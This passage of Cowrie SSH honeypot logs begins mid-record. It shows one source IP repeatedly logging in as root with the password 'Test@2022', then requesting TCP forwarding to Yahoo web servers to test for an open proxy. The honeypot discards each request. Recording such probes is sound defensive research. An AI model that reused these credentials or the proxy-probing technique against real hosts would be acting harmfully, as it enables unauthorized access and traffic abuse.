-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.216122Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.452019Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":10210,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10210","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.500300Z","session":"a211266f3b8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.547613Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":9188,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9188","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.685808Z","session":"a211266f3b8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.733499Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.781847Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21737,"dst_ip":"1.2.3.4","dst_port":22,"session":"952aada70fe0","protocol":"ssh","message":"New connection: 213.209.150.239:21737 (1.2.3.4:22) [session: 952aada70fe0]","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.828132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.829473Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.876676Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.112271Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8000,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8000","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.160627Z","session":"952aada70fe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.208032Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7078,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7078","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.345632Z","session":"952aada70fe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.392822Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.442428Z","src_ip":"213.209.150.239","session":"952aada70fe0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21783,"dst_ip":"1.2.3.4","dst_port":22,"session":"a98530a09222","protocol":"ssh","message":"New connection: 213.209.150.239:21783 (1.2.3.4:22) [session: a98530a09222]","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.497969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.499042Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.555699Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.838316Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17210,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17210","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.895777Z","session":"a98530a09222"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:11.952610Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9170,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9170","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.107474Z","session":"a98530a09222"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.164331Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.222050Z","src_ip":"213.209.150.239","session":"a98530a09222"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21837,"dst_ip":"1.2.3.4","dst_port":22,"session":"97f588cbfb57","protocol":"ssh","message":"New connection: 213.209.150.239:21837 (1.2.3.4:22) [session: 97f588cbfb57]","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.277768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.278941Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.335944Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.618581Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":292,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:292","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.677329Z","session":"97f588cbfb57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.734118Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23919,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23919","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.890977Z","session":"97f588cbfb57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:12.947547Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.005125Z","src_ip":"213.209.150.239","session":"97f588cbfb57"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21880,"dst_ip":"1.2.3.4","dst_port":22,"session":"200c377bb2f5","protocol":"ssh","message":"New connection: 213.209.150.239:21880 (1.2.3.4:22) [session: 200c377bb2f5]","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.060570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.061209Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.118196Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.401206Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5223,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5223","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.459040Z","session":"200c377bb2f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.515783Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":609,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:609","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.671273Z","session":"200c377bb2f5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.728071Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.785668Z","src_ip":"213.209.150.239","session":"200c377bb2f5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21939,"dst_ip":"1.2.3.4","dst_port":22,"session":"39db43c26a8c","protocol":"ssh","message":"New connection: 213.209.150.239:21939 (1.2.3.4:22) [session: 39db43c26a8c]","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.841234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.842525Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:13.899214Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.181817Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":16923,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:16923","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.240175Z","session":"39db43c26a8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.297176Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":7576,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7576","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.451136Z","session":"39db43c26a8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:14.507996Z","src_ip":"213.209.150.239","session":"39db43c26a8c"}
